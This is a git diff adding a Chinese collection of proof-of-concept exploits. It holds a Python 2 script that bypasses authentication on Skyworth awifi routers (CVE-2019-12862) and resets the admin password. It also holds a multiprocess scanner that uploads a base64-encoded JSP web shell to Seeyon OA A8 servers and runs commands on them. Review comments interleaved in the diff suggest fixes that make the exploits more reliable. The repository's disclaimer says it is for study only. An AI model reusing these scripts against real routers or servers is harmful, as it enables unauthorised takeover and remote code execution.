diff --git a/README.md b/README.md
new file mode 100644
index 0000000..af9bad2
--- /dev/null
+++ b/README.md
@@ -0,0 +1,29 @@
+- [Penetration_Testing_POC_With_Python](#PenetrationTestingPOCWithPython)
+ - [IOT Device](#IOT-Device)
+ - [Web APP](#Web-APP)
+ - [Mobile APP](#Mobile-APP)
+ - [PC](#PC)
+ - [说明](#%E8%AF%B4%E6%98%8E)
+
+# Penetration_Testing_POC_With_Python
+搜集有关渗透测试中用python编写的POC、脚本
+
+## IOT Device
+
+- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
+
+## Web APP
+
+- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
+
+## Mobile APP
+
+- 1.xxx
+
+## PC
+
+- 1.xxx
+
+## 说明
+
+> 此项目所有文章、代码均来源于互联网,仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任!
diff --git a/天翼创维awifi路由器存在多处未授权访问漏洞.md b/天翼创维awifi路由器存在多处未授权访问漏洞.md
new file mode 100644
index 0000000..4580bcc
--- /dev/null
+++ b/天翼创维awifi路由器存在多处未授权访问漏洞.md
@@ -0,0 +1,68 @@
+### 漏洞简介
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|天翼创维awifi路由器存在多处未授权访问漏洞|2019-06-01|H4lo|[http://www.skyworth.com/](http://www.skyworth.com/)|[http://www.skyworth.com/](http://www.skyworth.com/)|Boa/0.94.14rc21|[CVE-2019-12862](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12862)|
+
+### 漏洞详情PDF:[详情](POC_Details/1.天翼创维awifi路由器存在多处未授权访问漏洞.pdf)
+
+### POC实现代码如下:
+
+``` python
+#coding: utf-8
+#__author__: H4lo
+import requests
+import sys
+
+
+payload = "authflag=1"
+UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
+headers = {
+ "User-Agent": UA,
+ "Cookie": payload
+}
+
+def exp(ip):
+ info = """1. Login with no password\n2. Change administrator's password\n"""
+ print info
+ op = int(raw_input("Enter the options:"))
+ if op == 1:
+ url = "http://" + str(ip)+"/home.htm"
+ try:
+ res = requests.get(url,headers=headers,timeout=5)
+ if "title.htm" in res.text:
+ print "[+] The router is vulnerable"
+ else:
+ print "[-] The router is not vulnerable"
+ except Exception as e:
+ print str(e)
+
+ elif(op == 2):
+ url = "http://" + str(ip) + "/boafrm/formAwifiSwitchSetup"
+ data = {
+ "olduserpass":"1",
+ "newpass":"123456",
+ "confirmnewpass":"123456",
+ "submit-url":"/password.htm"
+ }
+ try:
+ res = requests.post(url=url,headers=headers,data=data,timeout=5)
+ if "restartNow" in res.text:
+ print "[+] Password had be changed to 123456"
+ else:
+ print "[-] Some error!"
+ except Exception as e:
+ print str(e)
+
+ else:
+ print "error options!"
+if __name__ == '__main__':
+ ip = sys.argv[1]
+ exp(ip)
+```
+
+---
+
+### POC截图效果如下:
+
+![POC运行截图](img/1.png)
diff --git a/致远OA_A8_getshell_0day.md b/致远OA_A8_getshell_0day.md
new file mode 100644
index 0000000..3967cd5
--- /dev/null
+++ b/致远OA_A8_getshell_0day.md
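Review bot: Option 2 of exp() resets the target router's administrator password to the hard-coded value `123456` from an interactive menu, with no confirmation and no way to pick another value, which is a destructive change for a proof-of-concept to make by default; take the replacement from the command line and refuse to POST without it, e.g. `new_pass = sys.argv[2] if len(sys.argv) > 2 else sys.exit("usage: poc.py <ip> <newpass>")` and then `"newpass": new_pass, "confirmnewpass": new_pass` in `data`, and give `ip = sys.argv[1]` the same usage guard since a missing argument currently dies with an IndexError. The fence is labelled `python` but `print info` and `raw_input(...)` are Python 2 only; the heading should say so, as the sibling 致远 file does with "python3 版本". Both code paths `print str(e)` on any exception and then fall through, so a timeout or connection error is reported the same way as a negative result — a one-line `[!] request failed:` prefix would keep the two apart. Note that the only thing distinguishing these requests from an ordinary fetch is the `Cookie: authflag=1` header, so the test in option 1 is worth a comment saying that is the bypass being checked.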
@@ -0,0 +1,108 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|seeyon_rce致远 OA A8 getshell_0day|2019-06-26|360-CERT|[http://www.skyworth.com/](http://www.seeyon.com/) | [http://www.seeyon.com/](http://www.seeyon.com/) | A8 V7.0 SP3/V6.1 SP2|[B6-2019-062601](https://cert.360.cn/warning/detail?id=d877451a4dbebd852d01e9730d762076)| + +### POC实现代码如下: + +```python +# Wednesday, 26 June 2019 +# Author:nianhua +# Blog:https://github.com/nian-hua/ +# python3 版本 + +import re +import requests +import base64 +from multiprocessing import Pool, Manager + +def send_payload(url): + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmV
xdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=" + + payload = base64.b64decode(payload) + + try: + + r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload) + + r = requests.get( + url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming') + + if "wangming" in r.text: + + return url + + else: + + return 0 + + except: + + return 0 + +def remove_control_chars(s): + control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160)))) + + control_char_re = re.compile('[%s]' % re.escape(control_chars)) + + s = control_char_re.sub('', s) + + if 'http' not in s: + + s = 'http://' + s + + return s + +def savePeopleInformation(url, queue): + + newurl = send_payload(url) + + if newurl != 0: + + fw = open('loophole.txt', 'a') + fw.write(newurl + '\n') + fw.close() + + queue.put(url) + +def main(): + + pool = Pool(10) + + queue = Manager().Queue() + + fr = open('url.txt', 'r') + + lines = fr.readlines() + + for i in lines: + + url = remove_control_chars(i) + + pool.apply_async(savePeopleInformation, args=(url, queue,)) + + allnum = len(lines) + + num = 0 + + while True: + + print(queue.get()) + + num += 1 + + if num >= allnum: + + fr.close() + + break + +if "__main__" == __name__: + + main() +``` +
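Review bot: The verification step in send_payload looks like it can never succeed: decoding the embedded base64 payload locally, the JSP it uploads appears to gate on `"asasd33445".equals(request.getParameter("pwd"))`, while the follow-up GET sends `pwd=asasd3344`, so the `wangming` echo would never appear and every host would be written off as not vulnerable even after the file was planted — please confirm by decoding the payload and make the two strings agree. Independently, the bare `except:` returning `0` makes a network error indistinguishable from a negative result, and neither request carries a `timeout`, so one unresponsive host can pin a pool worker indefinitely; `except requests.RequestException:` plus `timeout=10` on both calls fixes both. The check `cmd%20+/c+echo+wangming` is Windows-only, so Linux deployments are reported as not vulnerable whatever the upload did. The PoC also leaves `test123456.jsp` (which appears to wrap `Runtime.getRuntime().exec`) on every target it touches and never removes it; the file should state that and ideally add a cleanup step.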